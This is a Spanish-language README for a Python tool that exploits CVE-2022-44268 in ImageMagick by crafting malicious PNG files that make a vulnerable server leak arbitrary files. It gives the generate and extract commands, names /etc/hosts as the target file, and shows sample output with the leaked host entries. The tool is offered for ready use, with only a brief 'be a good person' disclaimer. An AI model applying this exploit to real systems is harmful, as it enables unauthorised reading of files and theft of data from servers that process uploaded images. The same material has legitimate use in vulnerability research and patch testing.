
Generador de exploits en Python para la vulnerabilidad de inclusión de archivos locales CVE-2022-44268 de ImageMagick. Crea archivos PNG maliciosos para leer archivos arbitrarios en sistemas vulnerables.
ImageMagick es un paquete de software multiplataforma gratuito y de código abierto para visualizar, convertir y editar imágenes rasterizadas y vectoriales. Puede leer y escribir más de 200 formatos de archivo de imagen. ImageMagick está bajo la licencia Apache 2.0. Está disponible como herramientas de línea de comandos, así como una API en C y un conjunto de clases en C++. Wikipedia
ImageMagick versiones 7.1.0-40 e inferiores son vulnerables a una vulnerabilidad de inclusión de archivos locales (Local File Inclusion). La vulnerabilidad se debe a una validación incorrecta de la entrada proporcionada por el usuario. Un atacante puede explotar esta vulnerabilidad enviando un archivo PNG manipulado al objetivo. La explotación exitosa podría permitir a un atacante leer archivos arbitrarios en el sistema objetivo.
Crédito a los investigadores que descubrieron esto:
Crear un PNG malicioso para aprovechar ImageMagick 7.1.0-40:
pip install Pillow)Crear un PNG con generate.py:
python3 generate.py -i input.png -f "/etc/hosts" -o exploit.png
______ __ _____ ______
| _ \ \ / / | __ \ | ____|
| |_) \ \_/ / | |__) |__ __ _ ______| |__ _ __ ___ __ _
| _ < \ / | ___/ _ \ / _` |______| __| '__/ _ \ / _` |
| |_) | | | | | | (_) | (_| | | | | | | (_) | (_| |
|____/ |_| |_| \___/ \__, | |_| |_| \___/ \__, |
__/ | __/ |
|___/ |___/
[*] ImageMagick LFI Exploit
[*] Insertando Payload para leer el archivo objetivo
[*] PNG de explotación generado: exploit.png
python3 extract.py downloaded_img.png
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Descargo de responsabilidad: Sé buena persona, por favor no lo uses para malas acciones.